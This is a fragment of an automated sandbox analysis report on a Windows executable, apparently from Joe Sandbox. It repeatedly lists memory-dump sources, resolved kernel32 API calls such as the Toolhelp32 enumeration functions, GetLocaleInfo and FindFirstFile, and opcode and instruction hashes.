                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                        • Instruction ID: 67256ad5df038b3606e19c3fd4962ab61de0c6f9014364b0e1939c668627c31a
                                                                                                        • Opcode Fuzzy Hash: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                        • Instruction Fuzzy Hash: 14F0139628E3C60EC303576409269487F705D4316030A42EBD1C5DF0E3D298494AC767
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cba690f5d47a957bd741ad652016bf341760dcd598b7de97cca600a313a2a569
                                                                                                        • Instruction ID: 89df57f7bb204646b55b26968683c4ef02bd8f4cea2b8bf6d4b7ab31e3d0ac35
                                                                                                        • Opcode Fuzzy Hash: cba690f5d47a957bd741ad652016bf341760dcd598b7de97cca600a313a2a569
                                                                                                        • Instruction Fuzzy Hash: 07E048753087045F5305EF65F862D26B7A9D7C9710351C57EF80487A50D939B8118468
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                        • API String ID: 667068680-597814768
                                                                                                        • Opcode ID: 0277385fd50417779046da1c97708c6cf814566de8c970d3c595449e61f88aca
                                                                                                        • Instruction ID: f9718cf08afcb7f2c123aec0f4f78f107bf5674d8a7886d8cd123c748e30e113
                                                                                                        • Opcode Fuzzy Hash: 0277385fd50417779046da1c97708c6cf814566de8c970d3c595449e61f88aca
                                                                                                        • Instruction Fuzzy Hash: 1C31EB74601620ABDB40EFA5E886F2E32A9AB56305BD0057FB400DF365C67DD80CAB5E
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00429480,?,005080A8), ref: 00426D9D
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00426DAE
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,005080A8), ref: 00426DE2
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426E53
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426E8E
                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EA1
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EAE
                                                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EBA
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480), ref: 00426EEE
                                                                                                        • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480), ref: 00426EFA
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00426F23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                        • API String ID: 3245196872-1565342463
                                                                                                        • Opcode ID: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                                                                        • Instruction ID: 586d1455b15d331b35c2532f7848297220251eb4538b3ec039515ff2587fd6f2
                                                                                                        • Opcode Fuzzy Hash: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                                                                        • Instruction Fuzzy Hash: E3513C71E00129EFCF11DBE8ED85AEFB7B8AF08304F950596A514E7281D7789E44CB68
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,005080A8), ref: 00426D9D
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00426DAE
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,005080A8), ref: 00426DE2
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426E53
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426E8E
                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EA1
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EAE
                                                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EBA
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00426EEE
                                                                                                        • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00426EFA
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00426F23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                        • String ID: GetLongPathNameA$kernel32.dll
                                                                                                        • API String ID: 3245196872-3214324292
                                                                                                        • Opcode ID: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                                                                        • Instruction ID: 586d1455b15d331b35c2532f7848297220251eb4538b3ec039515ff2587fd6f2
                                                                                                        • Opcode Fuzzy Hash: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                                                                        • Instruction Fuzzy Hash: E3513C71E00129EFCF11DBE8ED85AEFB7B8AF08304F950596A514E7281D7789E44CB68
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $&H68$&HA8$h#@
                                                                                                        • API String ID: 0-1988485601
                                                                                                        • Opcode ID: c12a2101702426d3b1f1055119c57048c86216995aa0e444666e172cc18084f5
                                                                                                        • Instruction ID: f198cd70f4d496bc7940f7355a5e4fe40ff025cce30350eb0c459dc764c5fff0
                                                                                                        • Opcode Fuzzy Hash: c12a2101702426d3b1f1055119c57048c86216995aa0e444666e172cc18084f5
                                                                                                        • Instruction Fuzzy Hash: A8130C71D002289BCB25DF65DD88BDEBBB9FB48301F1081EAE50AA6250DE745F85CF64
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0042AD73
                                                                                                        • FindClose.KERNEL32(00000000,00000000,?), ref: 0042AD7E
                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042AD97
                                                                                                        • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0042ADA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2659516521-0
                                                                                                        • Opcode ID: 4c8514bed77c8f8ef8ecd83c1db9f23a5fd5146bb2be9325bbea4d0af959dd89
                                                                                                        • Instruction ID: 10a826d6c87f77ee9b02bc66e20b2e495e265b6b27e8256208fcfbb2e3f103a5
                                                                                                        • Opcode Fuzzy Hash: 4c8514bed77c8f8ef8ecd83c1db9f23a5fd5146bb2be9325bbea4d0af959dd89
                                                                                                        • Instruction Fuzzy Hash: 35F01872E0421C66CF50E6E59D85ACFB3AC5F05324F900B97FA14E3191EA389B584755
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0042AD73
                                                                                                        • FindClose.KERNEL32(00000000,00000000,?), ref: 0042AD7E
                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042AD97
                                                                                                        • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0042ADA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2659516521-0
                                                                                                        • Opcode ID: 473b17c5f252b0e9e729cd0a96b9c16a6b6f39296930207070ea6e7241cc10d3
                                                                                                        • Instruction ID: 10a826d6c87f77ee9b02bc66e20b2e495e265b6b27e8256208fcfbb2e3f103a5
                                                                                                        • Opcode Fuzzy Hash: 473b17c5f252b0e9e729cd0a96b9c16a6b6f39296930207070ea6e7241cc10d3
                                                                                                        • Instruction Fuzzy Hash: 35F01872E0421C66CF50E6E59D85ACFB3AC5F05324F900B97FA14E3191EA389B584755
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042F6AC), ref: 0042F66E
                                                                                                        • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0042F6AC), ref: 0042F687
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 9a784085bd7f3538c7ce5e18c374c9a1980d11c38dae54d8af34c154640d9c4a
                                                                                                        • Instruction ID: 4091fbb67a12fb18c5be68bf9ecc5cfdf49809a89dc8e7d05204e8bc88a69848
                                                                                                        • Opcode Fuzzy Hash: 9a784085bd7f3538c7ce5e18c374c9a1980d11c38dae54d8af34c154640d9c4a
                                                                                                        • Instruction Fuzzy Hash: 97F0F631F086047FD700EEA2EC5299EB3BEDBC8718FD0C47AB110D3580EA7C65058658
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042F6AC), ref: 0042F66E
                                                                                                        • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0042F6AC), ref: 0042F687
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: f74e1652d328315e8a71d5c580b2509689d032b344377af24476d69b52f3eba1
                                                                                                        • Instruction ID: 4091fbb67a12fb18c5be68bf9ecc5cfdf49809a89dc8e7d05204e8bc88a69848
                                                                                                        • Opcode Fuzzy Hash: f74e1652d328315e8a71d5c580b2509689d032b344377af24476d69b52f3eba1
                                                                                                        • Instruction Fuzzy Hash: 97F0F631F086047FD700EEA2EC5299EB3BEDBC8718FD0C47AB110D3580EA7C65058658
                                                                                                        APIs
                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0042AFE8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DiskFreeSpace
                                                                                                        • String ID:
                                                                                                        • API String ID: 1705453755-0
                                                                                                        • Opcode ID: 1b8a2110958a1f89462fb010ca30020be9a49356f0795ae89d556df9bcdbb605
                                                                                                        • Instruction ID: 2def100504cc45c036bf0a67124c5dcfc61c37126cf4f8a29cb8a04150565c99
                                                                                                        • Opcode Fuzzy Hash: 1b8a2110958a1f89462fb010ca30020be9a49356f0795ae89d556df9bcdbb605
                                                                                                        • Instruction Fuzzy Hash: 7C11FEB1F00109AFDB44CFA9C9819EFF7F9FF8C304F51816AA519E7250E6359A018BA4
                                                                                                        APIs
                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0042AFE8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DiskFreeSpace
                                                                                                        • String ID:
                                                                                                        • API String ID: 1705453755-0
                                                                                                        • Opcode ID: 1b8a2110958a1f89462fb010ca30020be9a49356f0795ae89d556df9bcdbb605
                                                                                                        • Instruction ID: 2def100504cc45c036bf0a67124c5dcfc61c37126cf4f8a29cb8a04150565c99
                                                                                                        • Opcode Fuzzy Hash: 1b8a2110958a1f89462fb010ca30020be9a49356f0795ae89d556df9bcdbb605
                                                                                                        • Instruction Fuzzy Hash: 7C11FEB1F00109AFDB44CFA9C9819EFF7F9FF8C304F51816AA519E7250E6359A018BA4
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: af1bfd8e69f9984f7fb26f4ced8ddd975b12019d5febe14705a59c8ecca5b09a
                                                                                                        • Instruction ID: fb32a1b765e03203df5015b1259a1965979ba31e2bf7b5c5092c51118814488a
                                                                                                        • Opcode Fuzzy Hash: af1bfd8e69f9984f7fb26f4ced8ddd975b12019d5febe14705a59c8ecca5b09a
                                                                                                        • Instruction Fuzzy Hash: 8DF0CD70B04729EFE705DFA1EC52AAEB37AF784714F908576A11053590D7B82740C658
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 3c0648734114710e06f6f1c24ec6e0f83ae3f6c99a583367c63b78fb16a7a424
                                                                                                        • Instruction ID: fb32a1b765e03203df5015b1259a1965979ba31e2bf7b5c5092c51118814488a
                                                                                                        • Opcode Fuzzy Hash: 3c0648734114710e06f6f1c24ec6e0f83ae3f6c99a583367c63b78fb16a7a424
                                                                                                        • Instruction Fuzzy Hash: 8DF0CD70B04729EFE705DFA1EC52AAEB37AF784714F908576A11053590D7B82740C658
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 70ba8fbb5a0d667d47bb55d1dc4b5bdc7dc3dd4ba2f7f3f015b5b5c1073e8249
                                                                                                        • Instruction ID: 9adc8e24113dc74c646f78799680e7491a454e135354c415feb62a3ff91585d8
                                                                                                        • Opcode Fuzzy Hash: 70ba8fbb5a0d667d47bb55d1dc4b5bdc7dc3dd4ba2f7f3f015b5b5c1073e8249
                                                                                                        • Instruction Fuzzy Hash: 72E0D832B0023427D310A9596C829FB735C9B5C710F80417FBD05D7345EDB89D8446ED
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 02c76955cf76a6900d1ea8f5196ee3eba2b4828709b425f463c9b1e0e74b7afb
                                                                                                        • Instruction ID: 9adc8e24113dc74c646f78799680e7491a454e135354c415feb62a3ff91585d8
                                                                                                        • Opcode Fuzzy Hash: 02c76955cf76a6900d1ea8f5196ee3eba2b4828709b425f463c9b1e0e74b7afb
                                                                                                        • Instruction Fuzzy Hash: 72E0D832B0023427D310A9596C829FB735C9B5C710F80417FBD05D7345EDB89D8446ED
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 0042DF8B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 7cd62799840ad606dda073222d74f30895bf9c819bf335440192771876a3bc3b
                                                                                                        • Instruction ID: 215745da1fc6aec5115baa79eecb49f9d22e61944b801cb0a3a2e5464dd2748a
                                                                                                        • Opcode Fuzzy Hash: 7cd62799840ad606dda073222d74f30895bf9c819bf335440192771876a3bc3b
                                                                                                        • Instruction Fuzzy Hash: EDD05E6670E2602EA310955B3E85DBB4B9CCAC67A6F52443FF989C6201D6148C0A937D
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 0042DF8B
                                                                                                        Memory Dump Source
